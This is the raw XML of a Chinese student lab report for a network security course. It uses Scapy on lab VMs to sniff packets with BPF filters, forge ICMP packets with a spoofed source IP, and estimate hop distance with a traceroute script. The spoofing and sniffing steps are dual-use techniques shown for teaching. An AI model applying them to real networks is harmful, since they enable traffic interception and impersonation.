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36"/>
          <w:szCs w:val="44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第三次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>网安综合课程设计报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Packet Sniffing and Spoofing&amp;ARP Cache Poisoning Attack&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:highlight w:val="none"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center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57117228 陈佑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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IP地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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VM A 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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VM B 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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VM M 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Part1——Packet Sniffing and Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="2F5597" w:themeColor="accent5" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val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Sniffing Packets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实验目的—— 学习如何使用Scapy在Python程序中进行数据包嗅探。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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1.1A. 执行python程序嗅探数据包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4217670" cy="1778635"/>
            <wp:effectExtent l="0" t="0" r="11430" b="12065"/>
            <wp:docPr id="1" name="图片 1" descr="%RNI1${$A6YH$Y56Q`X]$)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%RNI1${$A6YH$Y56Q`X]$)C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程序对于每个捕获的数据包，回调函数print_pkt()都会被调用，此函数将打印出有关数据包的一些信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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Step1. 以root权限执行sniffer.py时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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64785" cy="430530"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="2" name="图片 2" descr="6HST4T1E@_WJ[@D_}7MJ]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6HST4T1E@_WJ[@D_}7MJ]XP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执行结果如上图所示，因为未接收到任何数据包，程序会发送阻塞。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打开新的终端，输入ping 0.0.0.0指令，在正在运行sniffer.py的终端中会打印输出以下数据：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###[ Ethernet ]### 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dst       = 00:00:00:00:00:00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src       = 00:00:00:00:00:00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type      = 0x800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###[ IP ]### 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version   = 4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ihl       = 5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tos       = 0x0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len       = 84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id        = 59153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flags     = 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frag      = 0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ttl       = 64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proto     = icmp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chksum    = 0x9595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src       = 127.0.0.1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dst       = 127.0.0.1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\options   \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###[ ICMP ]### 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   type      = echo-reply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   code      = 0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   chksum    = 0x146d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   id        = 0xcdb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   seq       = 0x4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###[ Raw ]### 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      load      = '\x05\x8eW_\x89\xc3\r\x00\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&amp;\'()*+,-./01234567'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Step2. 不以root权限执行sniffer.py时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62245" cy="2987675"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="5" name="图片 5" descr="K%M($SL[G8)G2PKBU4QQGO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K%M($SL[G8)G2PKBU4QQGOB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如上图所示，当以非root权限执行sniffer.py时，会报出“操作不被允许”的错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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1.1B. 改变过滤器的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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通常，当我们嗅探数据包时，只对某些类型的数据包感兴趣</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，因而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以在嗅探中设置过滤器。Scapy 的包过滤器使用BPF（Berkeley Packet Filter）语法。请设置以下过滤器，并再次演示您的嗅探程序（每个过滤器应分别设置）：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Step1. 只捕获 ICMP 包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2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更改过滤器的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>filter =’ icmp’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，ping 0.0.0.0时，执行程序的结果为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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…………………………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###[ Ethernet ]### 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dst       = 00:00:00:00:00:00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src       = 00:00:00:00:00:00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type      = 0x800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###[ IP ]### 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version   = 4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ihl       = 5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tos       = 0x0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len       = 84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id        = 8068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flags     = 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frag      = 0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ttl       = 64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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>proto     = icmp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chksum    = 0x5d23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src       = 127.0.0.1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dst       = 127.0.0.1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\options   \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###[ ICMP ]### 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type      = echo-reply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code      = 0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chksum    = 0x196c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id        = 0x34cf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seq       = 0x3c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###[ Raw ]### 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   load      = '\xf4\x81T_o\xa4\x0e\x00\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&amp;\'()*+,-./01234567'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4"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Step2. 捕获来自特定IP，以及目标端口是23的任何TCP包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2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在VM A（IP：10.0.2.4）设置过滤器为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>filter = ‘ip src 10.0.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and tcp and dst port 23’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，在VM B（IP：10.0.2.5）上使用telnet 10.0.2.4 23指令，执行程序结果为：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2" w:firstLineChars="200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（10.0.2.4是本机VM A的内网IP地址，telnet的端口号为23）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…………………………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###[ Ethernet ]### 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dst       = 08:00:27:2f:a8:23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src       = 08:00:27:36:0f:0c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type      = 0x800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###[ IP ]### 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version   = 4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ihl       = 5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tos       = 0x10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len       = 52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id        = 28507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flags     = DF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frag      = 0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ttl       = 64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proto     = tcp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chksum    = 0xb350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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>src       = 10.0.2.5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dst       = 10.0.2.4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\options   \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###[ TCP ]### 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sport     = 49033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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dport     = telnet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seq       = 3883306682L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ack       = 89895857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dataofs   = 8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reserved  = 0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flags     = A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window    = 123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chksum    = 0xd37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urgptr    = 0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options   = [('NOP', None), ('NOP', None), ('Timestamp', (387834, 423710))]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……………………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</w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Step2. 捕获来自或到达特定子网的数据包。可以选择任何子网，例如128.230.0.0/16; 不应选择VM所连接的子网。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2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设置过滤器为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">filter = ‘net </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>58.192.0.0/16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，使用ping www.seu.edu.cn指令，执行程序结果为：</w:t>
      </w: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###[ Ethernet ]### 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dst       = 08:00:27:2f:a8:23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src       = 52:54:00:12:35:00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type      = 0x800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###[ IP ]### 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version   = 4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ihl       = 5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tos       = 0x0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len       = 84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id        = 250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flags     = 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frag      = 0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ttl       = 248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proto     = icmp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chksum    = 0x45d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</w:t>
      </w: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src       = 58.192.118.142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dst       = 10.0.2.4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\options   \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###[ ICMP ]### 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   type      = echo-reply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   code      = 0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   chksum    = 0xb1f0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   id        = 0xda5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   seq       = 0x11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###[ Raw ]### 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      load      = '\xb3\x8fW_Dg\x06\x00\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&amp;\'()*+,-./01234567'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4"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val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Spoofing ICMP Packets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实验目的——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Scapy可以让我们将IP数据包的字段设置为任意值。在这个部分，我们要用一个任意的IP地址来伪造一个IP包。伪造一个ICMP回显请求数据包，并将这个数据包发送到另一个VM上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Step1. 在VM A上写程序spoofICMP.py，向VM B发送一个报文</w:t>
      </w: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VM A的IP地址为10.0.2.4，VM B的IP地址为10.0.2.5。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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71135" cy="756285"/>
            <wp:effectExtent l="0" t="0" r="12065" b="5715"/>
            <wp:docPr id="7" name="图片 7" descr="JQEMFM5QS_SG7A3`VAN~]@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JQEMFM5QS_SG7A3`VAN~]@K"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="708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68595" cy="793750"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="8" name="图片 8" descr="F]LEBV(]PP``@NYGP~4[]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F]LEBV(]PP``@NYGP~4[]RQ"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:srcRect b="727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spoofICMP.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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2458085" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="OY}9%XFBOX0Z)W60WL06Q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OY}9%XFBOX0Z)W60WL06QYA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5808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在VM B上打开wireshark准备抓包。程序执行后，向VM B发送一个报文，wireshark抓包结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32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-204470</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1466215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5632450" cy="368300"/>
                <wp:effectExtent l="13970" t="1270" r="17780" b="2413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38530" y="6343015"/>
                          <a:ext cx="5632450" cy="368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6.1pt;margin-top:115.45pt;height:29pt;width:443.5pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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vEcv3doAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQA36fdhlAgAAlQQAAA4AAAAAAAAAAQAgAAAAKQEAAGRycy9lMm9Eb2MueG1s&#10;UEsFBgAAAAAGAAYAWQEAAAAGAAAAAA==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71135" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="12065" b="6350"/>
            <wp:docPr id="9" name="图片 9" descr="1ZXMZ)MVW281%3IWNRG3YQ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ZXMZ)MVW281%3IWNRG3YQ4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="220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ICMP报文1（请求报文）的源地址为10.0.2.4（VM A），宿地址为10.0.2.5（VM B）。</w:t>
      </w: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ICMP报文2（响应报文）的源地址为10.0.2.5（VM B），宿地址为10.0.2.4（VM A）。</w:t>
      </w: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Scapy伪造报文成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Step2. 修改spoofICMP.py，向VM B发送一个伪造源地址的报文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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2702560" cy="1626870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="11430"/>
            <wp:docPr id="11" name="图片 11" descr="J`Y8A)0G9`{G4DE70Q7EH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J`Y8A)0G9`{G4DE70Q7EH0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如上图所示，添加一行伪造的源地址a.src="192.168.1.11"，再次发送，wireshark的抓包结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32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-140970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1139825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5632450" cy="368300"/>
                <wp:effectExtent l="13970" t="1270" r="17780" b="2413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2450" cy="368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1.1pt;margin-top:89.75pt;height:29pt;width:443.5pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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BzAXAl&#10;2gAAAAsBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJA&#10;gnXGoFgCAACKBAAADgAAAAAAAAABACAAAAApAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZ&#10;AQAA8wUAAAAA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64785" cy="1534160"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="12" name="图片 12" descr="SE}HAM252}$KV)TYVQ@JB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E}HAM252}$KV)TYVQ@JBAK"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="2416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抓到两个ICMP报文，其中ICMP报文1（请求报文）的源地址为192.168.1.11，而不是VM A的真实IP地址10.0.2.4，故Scapy成功地以任意IP地址伪造了一个包。</w:t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1.3. Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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在这一部分，我们要使用Scapy来估计VM与目标主机之间的距离（路由数量）。原理很简单：就是利用TTL（Time-To-Live）的特性，每经过一个路由器，TTL值就会减去1，当TTL减到0时，这个数据包就会被丢弃，同时该路由器会回发一个ICMP错误信息。因为每次的路由路径可能会不一样，所以我们只能估计VM到目标主机的距离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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Step1. 编写代码traceroute.py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from scapy.all import *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import sys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ip_dst = sys.argv[1]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if len(sys.argv) &lt; 2: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print ("[Usage]: python %s dstip" %(sys.argv[0]))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exit(1)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a = IP()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a.dst = ip_dst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b = ICMP()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">isGetDis = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##isGetDis表示是否到达目标IP地址，未到达时为0，到达为1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">mTTL = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##初始TTL设置为1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i = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##初始距离设置为1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">while isGetDis == False : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##当没有到达目标IP地址时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a.ttl = mTTL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="48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ans, unans = sr(a/b)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>###s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>r函数是Scapy的核心，这个函数返回两个列表，第一个列表是收到应答的包和其对应的应答，第二个列表是未收到应答的包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>###ans表示已经收到应答的包和对应的应答</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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  <w:t>###unans表示未收到应答的包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if ans.res[0][1].type == 0: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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>isGetDis = True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else: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##当此时依旧没有到达目标IP地址时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   i += 1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   mTTL += 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##增大mTTL的值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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print ('The Distance from VM to ip:%s is %d '%(ip_dst, i)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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  <w:t>##输出距离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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程序首先设置isGetDis为0，i（距离）为1，当在TTL内无法到达指定的目标IP地址时，isGetDis始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终为0，并且TTL加一，距离值加一。当TTL增长到其能够到达指定的目标IP地址时，isGetDis设为1，返回距离值i。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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Step2. 运行traceroute.py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如下图所示，当目的地址为58.192.118.142（www.seu.edu.cn的IP地址）时，需要经过8个路由器。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73040" cy="3647440"/>
            <wp:effectExtent l="0" t="0" r="10160" b="10160"/>
            <wp:docPr id="17" name="图片 17" descr="F_[JJSK0FGNB`}%$ZL%WT%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F_[JJSK0FGNB`}%$ZL%WT%T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-64770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5454650" cy="254635"/>
                <wp:effectExtent l="13970" t="1270" r="17780" b="23495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4650" cy="2546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5.1pt;margin-top:13.45pt;height:20.05pt;width:429.5pt;z-index:251662336;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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KbCg+bYAAAACQEA&#10;AA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kBTZR4MUwIA&#10;AIoEAAAOAAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAGAFkBAADsBQAA&#10;AAA=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4"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="363220"/>
